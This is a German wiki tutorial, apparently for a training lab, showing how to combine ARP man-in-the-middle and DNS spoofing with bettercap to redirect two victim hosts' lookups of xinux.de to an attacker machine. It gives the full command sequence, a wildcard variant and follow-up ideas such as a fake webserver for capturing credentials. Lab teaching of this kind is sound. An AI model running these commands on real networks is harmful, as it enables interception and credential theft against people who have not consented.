DNS Spoofing mit bettercap
Zur Navigation springen
Zur Suche springen
DNS Spoofing mit bettercap
Umgebung
KALI = 192.168.16.101 (Angreifer) ALICE = 192.168.16.131 (Opfer 1) BOB = 192.168.16.132 (Opfer 2) ZIEL = xinux.de (echte IP: 94.130.248.215) FAKE-IP = 192.168.16.101 (Kali täuscht vor xinux.de zu sein)
Vorbereitung auf Alice und Bob
- Echte IP prüfen (vor dem Angriff)
host -4 xinux.de xinux.de has address 94.130.248.215
Angreifer - bettercap starten
sudo bettercap -iface eth0
In der bettercap-Konsole
- ARP MITM + DNS Spoofing kombiniert
set arp.spoof.targets 192.168.16.131,192.168.16.132 set arp.spoof.internal true set arp.spoof.fullduplex true set dns.spoof.domains xinux.de set dns.spoof.address 192.168.16.101 arp.spoof on dns.spoof on net.sniff on
Optionen
- set arp.spoof.targets → Alice und Bob als Ziele
- set arp.spoof.internal true → Host-zu-Host Spoofing
- set arp.spoof.fullduplex true → beide Hosts werden getäuscht
- set dns.spoof.domains → welche Domain gefälscht wird
- set dns.spoof.address → wohin die Domain umgeleitet wird
- arp.spoof on → ARP Spoofing aktivieren (MITM Voraussetzung)
- dns.spoof on → DNS Spoofing aktivieren
- net.sniff on → Paketmitschnitt aktivieren
Test auf Alice
- Nach dem Angriff - gefälschte IP wird zurückgegeben
host -4 xinux.de xinux.de has address 192.168.16.101
ping xinux.de PING xinux.de (192.168.16.101)...
Test auf Bob
- Gleiches Ergebnis auf Bob
host -4 xinux.de xinux.de has address 192.168.16.101
Wildcard - alle Subdomains abfangen
- Alle Subdomains von xinux.de ebenfalls umleiten
set dns.spoof.domains *.xinux.de,xinux.de
Hinweis zur Netzwerkumgebung
- Getestet mit VirtualBox Internal Network
- Bei Bridge-Adapter kann das Gateway ARP-Replies überschreiben
- Empfehlung für das Labor: VirtualBox Internal Network verwenden
Mögliche Folgeangriffe
- mitmproxy für HTTP(S)-Manipulation
- Fake Webserver zum Abfangen von Zugangsdaten
- Ngrep zur Paketanalyse